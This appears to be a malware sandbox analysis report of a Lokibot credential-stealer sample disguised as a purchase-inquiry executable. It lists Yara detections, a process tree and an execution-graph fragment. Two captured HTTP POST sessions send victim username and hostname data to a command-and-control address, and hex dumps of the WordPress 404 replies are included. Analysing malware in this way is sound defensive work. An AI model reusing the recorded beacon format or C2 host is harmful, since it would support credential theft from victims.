                  May 27, 2024 08:33:58.545037031 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.44978845.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:58.696744919 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:58.701946974 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:34:00.846537113 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:59 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:34:00.846615076 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:34:00.846651077 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:34:00.846683979 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:34:00.846719027 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:34:00.846752882 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:34:00.846785069 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:34:00.846916914 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:34:00.846988916 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:34:00.847017050 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.44978945.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:34:01.009453058 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:34:01.015026093 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:34:03.114726067 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:34:01 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:34:03.114890099 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:34:03.114929914 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:34:03.114984035 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:34:03.115087986 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:34:03.115134954 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:34:03.115168095 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:34:03.115225077 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:34:03.115256071 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:34:03.115317106 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:02:31:55
                  Start date:27/05/2024
                  Path:C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Purchase Inquiry_#466789.exe"
                  Imagebase:0x860000
                  File size:534'536 bytes
                  MD5 hash:5EECE0F9333721C96803F39BECAE9FA3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:02:31:57
                  Start date:27/05/2024
                  Path:C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Purchase Inquiry_#466789.exe"
                  Imagebase:0xb00000
                  File size:534'536 bytes
                  MD5 hash:5EECE0F9333721C96803F39BECAE9FA3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:false

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:100
                    Total number of Limit Nodes:8
                    execution_graph 20571 5906440 20572 59063f6 20571->20572 20573 590640b 20572->20573 20576 5906eb0 20572->20576 20582 5906ec0 20572->20582 20577 5906ec0 20576->20577 20588 5906f00 20577->20588 20594 5906f49 20577->20594 20601 5906ef0 20577->20601 20578 5906ee7 20578->20573 20583 5906ed5 20582->20583 20585 5906f00 2 API calls 20583->20585 20586 5906ef0 2 API calls 20583->20586 20587 5906f49 2 API calls 20583->20587 20584 5906ee7 20584->20573 20585->20584 20586->20584 20587->20584 20589 5906f1a 20588->20589 20590 5906f2c 20589->20590 20591 5906f49 2 API calls 20589->20591 20593 5906f3e 20590->20593 20607 5907339 20590->20607 20591->20590 20593->20578 20595 5906f1f 20594->20595 20598 5906f52 20594->20598 20596 5906f2c 20595->20596 20600 5906f49 2 API calls 20595->20600 20597 5906f3e 20596->20597 20599 5907339 2 API calls 20596->20599 20597->20578 20599->20597 20600->20596 20602 5906f00 20601->20602 20603 5906f2c 20602->20603 20604 5906f49 2 API calls 20602->20604 20605 5907339 2 API calls 20603->20605 20606 5906f3e 20603->20606 20604->20603 20605->20606 20606->20578 20608 590733f 20607->20608 20612 5905fe0 20608->20612 20616 5905fd4 20608->20616 20613 5906069 CreateProcessA 20612->20613 20615 590622b 20613->20615 20617 5906069 CreateProcessA 20616->20617 20619 590622b 20617->20619 20530 116d5d0 DuplicateHandle 20531 116d666 20530->20531 20532 116abf0 20536 116ace8 20532->20536 20544 116acd9 20532->20544 20533 116abff 20537 116acf9 20536->20537 20538 116ad1c 20536->20538 20537->20538 20552 116af70 20537->20552 20556 116af80 20537->20556 20538->20533 20539 116ad14 20539->20538 20540 116af20 GetModuleHandleW 20539->20540 20541 116af4d 20540->20541 20541->20533 20545 116acf9 20544->20545 20546 116ad1c 20544->20546 20545->20546 20550 116af70 LoadLibraryExW 20545->20550 20551 116af80 LoadLibraryExW 20545->20551 20546->20533 20547 116ad14 20547->20546 20548 116af20 GetModuleHandleW 20547->20548 20549 116af4d 20548->20549 20549->20533 20550->20547 20551->20547 20554 116af94 20552->20554 20553 116afb9 20553->20539 20554->20553 20560 116a070 20554->20560 20557 116af94 20556->20557 20558 116afb9 20557->20558 20559 116a070 LoadLibraryExW 20557->20559 20558->20539 20559->20558 20561 116b160 LoadLibraryExW 20560->20561 20563 116b1d9 